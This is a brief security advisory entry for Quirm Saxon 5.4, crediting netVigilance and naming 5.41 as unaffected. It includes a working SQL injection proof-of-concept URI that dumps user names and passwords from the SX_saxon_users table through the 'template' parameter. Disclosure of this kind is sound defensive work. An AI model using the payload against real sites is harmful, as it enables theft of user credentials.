netVigilance is credited with the discovery of this vulnerability.
Vulnerable
Quirm Saxon 5.4
Not Vulnerable
Quirm Saxon 5.41
Code
Attackers can use a browser to exploit this issue.The following proof-of-concept URI is available:http://www.example.com/example.php?template=' UNION SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(USER_NAME, USER_PWD), NULL FROM SX_saxon_users %23